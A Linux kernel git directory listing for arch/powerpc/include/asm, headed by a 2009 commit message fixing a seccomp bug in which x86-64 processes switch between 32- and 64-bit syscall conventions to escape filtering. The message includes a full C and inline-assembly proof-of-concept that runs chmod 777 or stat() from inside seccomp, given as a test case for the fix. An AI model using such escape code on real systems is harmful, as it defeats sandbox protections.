linux/arch/powerpc/include/asm
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
..
iseries
8xx_immap.h
8253pit.h
abs_addr.h
agp.h
asm-compat.h
atomic.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
auxvec.h
backlight.h
bitops.h
bootx.h
btext.h
bug.h powerpc: Fix asm EMIT_BUG_ENTRY with !CONFIG_BUG 2008-12-16 15:53:23 +11:00
bugs.h
byteorder.h byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
cache.h
cacheflush.h
cell-pmu.h powerpc/oprofile: IBM CELL: add SPU event profiling support 2009-01-08 15:51:55 +01:00
cell-regs.h
checksum.h
clk_interface.h
code-patching.h
compat.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
cpm1.h
cpm2.h fs_enet: Fix SCC Ethernet on CPM2, and crash in fs_enet_rx_napi() 2008-08-27 05:16:38 -04:00
cpm.h
cputable.h powerpc/mm: Introduce MMU features 2008-12-21 14:21:16 +11:00
cputhreads.h
cputime.h
current.h
dbdma.h
dcr-generic.h
dcr-mmio.h
dcr-native.h powerpc/4xx: Extended DCR support v2 2008-12-21 14:21:15 +11:00
dcr-regs.h ibm_newemac: Fix EMAC soft reset on 460EX/GT 2008-10-08 15:27:14 -07:00
dcr.h powerpc: Const-qualify Device Node Argument to DCR Resource Extent API 2008-12-21 14:21:16 +11:00
delay.h
device.h powerpc and sparc: Introduce dev_archdata node accessors 2008-12-03 21:03:54 +11:00
disassemble.h ppc: Create disassemble.h to extract instruction fields 2008-12-31 16:52:21 +02:00
div64.h
dma-mapping.h powerpc: Fix !CONFIG_PPC_NEED_DMA_SYNC_OPS build warning 2008-12-16 14:39:33 +11:00
dma.h
edac.h
eeh_event.h
eeh.h powerpc/pci: Split pcibios_fixup_bus() into bus setup and device setup 2008-11-06 09:22:37 +11:00
elf.h [S390] arch_setup_additional_pages arguments 2008-12-25 13:38:54 +01:00
emergency-restart.h
errno.h
exception.h powerpc: Make it possible to move the interrupt handlers away from the kernel 2008-09-15 11:08:08 -07:00
fb.h
fcntl.h
feature-fixups.h powerpc/mm: Introduce MMU features 2008-12-21 14:21:16 +11:00
firmware.h
fixmap.h
floppy.h
fs_pd.h
fsl_gtm.h
fsl_lbc.h powerpc: fix fsl_upm nand driver modular build 2008-10-13 11:48:24 -05:00
ftrace.h powerpc/ppc64: ftrace, handle module trampolines for dyn ftrace 2008-11-20 10:52:28 -08:00
futex.h
gpio.h
grackle.h
hardirq.h
heathrow.h
highmem.h powerpc/44x: Support 16K/64K base page sizes on 44x 2008-12-29 09:53:25 +11:00
hugetlb.h mm: report the MMU pagesize in /proc/pid/smaps 2009-01-06 15:58:58 -08:00
hvcall.h powerpc: Make CMO paging space pool ID and page size available 2008-08-18 14:22:34 +10:00
hvconsole.h
hvcserver.h
hw_irq.h
hydra.h
i8259.h
ibmebus.h
ide.h cleanup powerpc/include/asm/ide.h 2008-08-18 21:40:03 +02:00
immap_86xx.h
immap_cpm2.h powerpc: Update QE/CPM2 usb_ctlr structures for USB support 2008-11-08 12:39:02 -06:00
immap_qe.h powerpc: Update QE/CPM2 usb_ctlr structures for USB support 2008-11-08 12:39:02 -06:00
io-defs.h
io.h powerpc: Remove dead BIO_VMERGE_BOUNDARY definition 2008-12-16 15:53:19 +11:00
ioctl.h
ioctls.h powerpc: Add ioctls for RS485 mode control of serial drivers 2009-01-08 16:25:12 +11:00
iommu.h powerpc: Update remaining dma_mapping_ops to use map/unmap_page 2008-10-31 16:13:48 +11:00
ipcbuf.h
ipic.h
irq_regs.h
irq.h powerpc: Separate the irq radix tree insertion and lookup 2008-09-15 11:08:44 -07:00
irqflags.h powerpc: Fix lockdep IRQ tracing bug 2008-08-18 14:22:34 +10:00
Kbuild byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
kdebug.h
kdump.h powerpc/32: Wire up the trampoline code for kdump 2008-12-23 15:13:29 +11:00
kexec.h powerpc/kdump: Use ppc_save_regs() in crash_setup_regs() 2009-01-08 16:25:17 +11:00
keylargo.h
kgdb.h
kmap_types.h
kprobes.h
kvm_44x.h KVM: ppc: save and restore guest mappings on context switch 2008-12-31 16:55:09 +02:00
kvm_asm.h
kvm_host.h KVM: ppc: mostly cosmetic updates to the exit timing accounting code 2008-12-31 16:55:41 +02:00
kvm_para.h
kvm_ppc.h KVM: ppc: directly insert shadow mappings into the hardware TLB 2008-12-31 16:55:09 +02:00
kvm.h
libata-portmap.h
linkage.h
lmb.h
local.h powerpc: Tell gcc when we clobber the carry in inline asm 2008-11-19 16:04:28 +11:00
lppaca.h powerpc: Update page-in counter for CMM 2008-11-05 22:08:28 +11:00
lv1call.h
machdep.h powerpc: Merge 32 and 64-bit dma code 2008-09-24 16:26:45 -05:00
macio.h
mc146818rtc.h
mediabay.h
mman.h powerpc: Get USE_STRICT_MM_TYPECHECKS working again 2008-10-14 10:35:27 +11:00
mmu_context.h powerpc/mm: Split mmu_context handling 2008-12-21 14:21:15 +11:00
mmu-8xx.h powerpc/mm: Rework context management for CPUs with no hash table 2008-12-21 14:21:15 +11:00
mmu-40x.h powerpc/mm: Rework context management for CPUs with no hash table 2008-12-21 14:21:15 +11:00
mmu-44x.h powerpc/44x: declare tlb_44x_index for use in C code 2008-12-31 16:55:09 +02:00
mmu-fsl-booke.h powerpc/mm: Rework context management for CPUs with no hash table 2008-12-21 14:21:15 +11:00
mmu-hash32.h
mmu-hash64.h powerpc set_huge_psize() false positive 2008-11-30 10:03:35 -08:00
mmu.h powerpc/mm: Add SMP support to no-hash TLB handling 2008-12-21 14:21:16 +11:00
mmzone.h
module.h powerpc/ppc32: ftrace, dynamic ftrace to handle modules 2008-11-20 10:52:53 -08:00
mpc6xx.h
mpc8xx.h
mpc52xx_psc.h powerpc/mpc5200: add rts/cts handling in PSC UART driver 2008-12-21 02:54:32 -07:00
mpc52xx.h powerpc/mpc5200: Document and tidy irq driver 2008-12-21 02:54:26 -07:00
mpc86xx.h
mpc512x.h
mpc8260.h
mpic.h powerpc/mpic: Fix regression caused by change of default IRQ affinity 2008-10-31 16:13:50 +11:00
msgbuf.h
msi_bitmap.h powerpc: Split-out common MSI bitmap logic into msi_bitmap.c 2008-08-20 16:34:57 +10:00
mutex.h powerpc: Optimise mutex 2008-11-19 16:04:58 +11:00
nvram.h
of_device.h powerpc: Remove include of linux/of_device.h from asm/of_device.h 2008-08-20 16:34:59 +10:00
of_platform.h powerpc: Remove include of linux/of_platform.h from asm/of_platform.h 2008-08-20 16:34:58 +10:00
ohare.h
oprofile_impl.h powerpc/oprofile: IBM CELL: add SPU event profiling support 2009-01-08 15:51:55 +01:00
paca.h powerpc: Make it possible to move the interrupt handlers away from the kernel 2008-09-15 11:08:08 -07:00
page_32.h powerpc/44x: Support 16K/64K base page sizes on 44x 2008-12-29 09:53:25 +11:00
page_64.h
page.h powerpc/44x: Support 16K/64K base page sizes on 44x 2008-12-29 09:53:25 +11:00
param.h
parport.h
pasemi_dma.h
pci-bridge.h powerpc: Introduce ppc_pci_flags accessors 2008-12-16 15:53:16 +11:00
pci.h powerpc: Introduce ppc_pci_flags accessors 2008-12-16 15:53:16 +11:00
percpu.h
pgalloc-32.h powerpc: Use RCU based pte freeing mechanism for all powerpc 2008-12-03 20:46:35 +11:00
pgalloc-64.h powerpc: Use RCU based pte freeing mechanism for all powerpc 2008-12-03 20:46:35 +11:00
pgalloc.h powerpc: Use RCU based pte freeing mechanism for all powerpc 2008-12-03 20:46:35 +11:00
pgtable-4k.h powerpc/mm: Fix _PAGE_CHG_MASK to protect _PAGE_SPECIAL 2009-02-13 16:37:44 +11:00
pgtable-64k.h powerpc/mm: Fix _PAGE_CHG_MASK to protect _PAGE_SPECIAL 2009-02-13 16:37:44 +11:00
pgtable-ppc32.h powerpc/mm: Fix _PAGE_CHG_MASK to protect _PAGE_SPECIAL 2009-02-13 16:37:44 +11:00
pgtable-ppc64.h powerpc/mm: Rework usage of _PAGE_COHERENT/NO_CACHE/GUARDED 2008-12-21 14:21:16 +11:00
pgtable.h powerpc/mm: Rework usage of _PAGE_COHERENT/NO_CACHE/GUARDED 2008-12-21 14:21:16 +11:00
phyp_dump.h
pmac_feature.h
pmac_low_i2c.h
pmac_pfunc.h
pmc.h
pmi.h
poll.h
posix_types.h
ppc4xx.h
ppc_asm.h powerpc/32: Add the ability for a classic ppc kernel to be loaded at 32M 2008-12-23 15:13:29 +11:00
ppc-pci.h
processor.h powerpc: Remove `have_of' global variable 2008-12-16 15:52:57 +11:00
prom.h powerpc: Add of_find_next_cache_node() 2008-12-21 14:21:14 +11:00
ps3.h powerpc/ps3: Use dma_addr_t down through the stack 2009-01-16 16:15:11 +11:00
ps3av.h powerpc/ps3: Replace the flip_ctl logic in ps3av and ps3fb by a mutex 2008-11-19 16:03:54 +11:00
ps3fb.h
ps3stor.h
pSeries_reconfig.h
ptrace.h remove __ARCH_WANT_COMPAT_SYS_PTRACE 2008-11-30 11:00:15 -08:00
qe_ic.h powerpc/qe: Fix few build errors with CONFIG_QUICC_ENGINE=n 2008-12-30 11:14:06 -06:00
qe.h powerpc/qe: add Ethernet UPSMR definitions to QE library 2009-01-07 09:18:53 -06:00
reg_8xx.h
reg_booke.h powerpc: Introduce local (non-broadcast) forms of tlb invalidates 2008-09-24 16:29:40 -05:00
reg_fsl_emb.h
reg.h powerpc: Prepare xmon_save_regs for use with kdump 2008-12-23 15:13:28 +11:00
resource.h
rheap.h
rio.h
rtas.h powerpc: Change u64/s64 to a long long integer type 2009-01-13 14:47:59 +11:00
rtc.h
rwsem.h
scatterlist.h
seccomp.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
sections.h Merge commit 'origin' 2008-10-15 11:31:54 +11:00
sembuf.h
serial.h
setjmp.h
setup.h
sfp-machine.h powerpc: Add SPE/EFP math emulation for E500v1/v2 processors. 2008-12-03 08:19:16 -06:00
shmbuf.h
shmparam.h
sigcontext.h
siginfo.h signals: demultiplexing SIGTRAP signal 2008-09-23 13:26:52 +02:00
signal.h x86, um: get rid of uml signal.h 2008-10-22 22:55:20 -07:00
smp.h powerpc: Provide a separate handler for each IPI action 2008-11-19 16:05:06 +11:00
smu.h
socket.h
sockios.h
sparsemem.h
spinlock_types.h
spinlock.h powerpc: Tell gcc when we clobber the carry in inline asm 2008-11-19 16:04:28 +11:00
spu_csa.h
spu_info.h
spu_priv1.h
spu.h powerpc/cell: Bitops work on unsigned longs 2009-01-08 16:25:12 +11:00
sstep.h
stat.h
statfs.h PowerPC: Use <asm-generic/statfs.h> 2008-09-06 19:30:15 +01:00
string.h
suspend.h
swab.h powerpc: introduce asm/swab.h 2009-01-06 18:10:27 -08:00
synch.h powerpc: Optimise smp_wmb 2008-11-19 16:04:55 +11:00
syscall.h
syscalls.h
systbl.h [CVE-2009-0029] Rename old_readdir to sys_old_readdir 2009-01-14 14:15:15 +01:00
system.h powerpc: Optimise smp_rmb 2008-11-19 16:04:57 +11:00
tce.h
termbits.h
termios.h
thread_info.h
time.h powerpc: Eliminate unused do_gtod variable 2008-11-06 09:49:28 +11:00
timex.h
tlb.h
tlbflush.h powerpc/mm: Split low level tlb invalidate for nohash processors 2008-12-21 14:21:16 +11:00
topology.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask into merge-rr-cpumask 2009-01-03 18:53:31 +01:00
tsi108_irq.h
tsi108_pci.h
tsi108.h
types.h powerpc: Change u64/s64 to a long long integer type 2009-01-13 14:47:59 +11:00
uaccess.h
ucc_fast.h
ucc_slow.h
ucc.h
ucontext.h
udbg.h
uic.h
unaligned.h
uninorth.h
unistd.h
user.h
vdso_datapage.h powerpc: Improve resolution of VDSO clock_gettime 2008-11-06 09:49:22 +11:00
vdso.h
vga.h
vio.h
xilinx_intc.h
xmon.h
xor.h